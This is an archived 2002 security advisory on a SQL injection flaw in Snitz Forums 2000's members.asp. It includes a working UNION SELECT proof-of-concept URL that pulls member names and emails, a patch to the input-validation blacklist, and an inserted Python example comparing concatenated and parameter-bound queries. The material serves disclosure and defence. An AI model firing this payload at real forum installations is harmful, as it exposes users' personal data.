Snitz Forums 2000 remote SQL query manipulation vulnerability

From: acemi (acemi_5at_private)
Date: Fri Apr 19 2002 - 14:06:46 PDT


    
    vulnerable
    ----------
    Product : Snitz Forums 2000
    Version :
    3.3
    3.3.01
    3.3.02
    3.3.03 (last stable version)
    Object  : members.asp
    Class   : Input validation error (remote SQL query manipulation vulnerability)
    Vendor-URL     : http://forum.snitz.com/
    Vendor-Status  : informed, not patched
    Remote-Exploit : yes
    
    
    Introduction
    ------------
    Snitz Forums 2000 is open source ASP-based web 
    forum software. It runs on Microsoft Windows 
    operating systems. A vulnerability exists in Snitz 
    Forums 2000 which makes it possible for a malicious 
    user to remotely manipulate the logic of SQL queries. 
    As a result, it may be possible for attackers to view all 
    data in the forum's database. This vulnerability can 
    be exploited with a web browser.
    
    More Details
    ------------
    In the members.asp page, when listing members that match a search 
    criterion, the M_NAME input is not checked for malicious content. As a 
    result, an attacker can append an extra SELECT statement to the query 
    with UNION and view any data in the forum's database.
    
    
    Proof-of-concept
    ----------------
    Normally, to view the list of members whose member name starts with 
    'A', members.asp is called as follows:
    
    /members.asp?mode=search&M_NAME=A&initial=1&method=
    
    
    Use this link to view the vulnerability:
    
    /members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=
    
    In the resulting list, the MEMBERNAME column will contain 
    MEMBERNAME/EMAIL/ instead of the member name alone.
    
    
    Temporary fix
    -------------
    To fix this bug, change the following lines in members.asp:
    
    SearchName = Request("M_NAME")
    if SearchName = "" then
    SearchName = Request.Form("M_NAME")
    end if
    
    
    with:
    
    if IsValidString(Request("M_NAME")) then
    SearchName = Request("M_NAME")
    end if
    
    if SearchName = "" then
    if IsValidString(Request.Form("M_NAME")) then
    SearchName = Request.Form("M_NAME")
    end if
    end if
    
    
    and in the function IsValidString(sValidate) in inc_functions.asp, 
    change the following line:
    
    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
    
    with:
    
    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
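    The following Python example is added here and is not part of the advisory or of Snitz Forums 2000. It mirrors the patched IsValidString() blacklist and contrasts a LIKE query built by string concatenation (its shape is an assumption reconstructed from the PoC URL) with a parameter-bound query, against a constructed in-memory FORUM_MEMBERS table.

```python
import sqlite3

# Blacklist from the advisory's patched IsValidString() in inc_functions.asp,
# with the single quote added (the temporary fix above).
INVALID_CHARS = "!#$%^&*()=+{}[]|\\;:/?>,<'"

def is_valid_string(s):
    """Python equivalent of IsValidString(): reject any blacklisted character."""
    return not any(c in INVALID_CHARS for c in s)

def build_db():
    """Constructed in-memory stand-in for FORUM_MEMBERS (column names from the
    PoC URL; rows and the reduced schema are invented sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE FORUM_MEMBERS (MEMBER_ID INTEGER, M_NAME TEXT, M_EMAIL TEXT)")
    db.executemany("INSERT INTO FORUM_MEMBERS VALUES (?, ?, ?)",
                   [(1, "alice", "alice@example.org"), (2, "bob", "bob@example.org")])
    return db

def search_members_vulnerable(db, name):
    """Assumed shape of the unpatched query, reconstructed from the PoC: the
    search term is concatenated straight into the LIKE clause."""
    sql = ("SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS "
           "WHERE (M_NAME LIKE '" + name + "%')")
    return db.execute(sql).fetchall()

def concatenation_breaks_on(db, name):
    """True if the concatenated query no longer parses for this input, i.e. the
    input has escaped the string literal (the injection surface)."""
    try:
        search_members_vulnerable(db, name)
        return False
    except sqlite3.OperationalError:
        return True

def search_members_param(db, name):
    """Parameter binding: the term is handed to the driver separately and is
    never interpreted as SQL, so quotes in a name are harmless."""
    sql = "SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS WHERE (M_NAME LIKE ?)"
    return db.execute(sql, (name + "%",)).fetchall()

def search_members_safe(db, name):
    """Advisory's temporary fix layered on top of binding: invalid input is
    rejected (returns None) before any query is built."""
    if not is_valid_string(name):
        return None
    return search_members_param(db, name)
# Decoded start of the advisory's PoC M_NAME value (truncated to its prefix).
POC_PREFIX = "XXXX%') UNION SELECT "
```

    Note that the blacklist also rejects legitimate names containing an apostrophe, which parameter binding alone handles correctly.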
    



    This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 16:21:12 PDT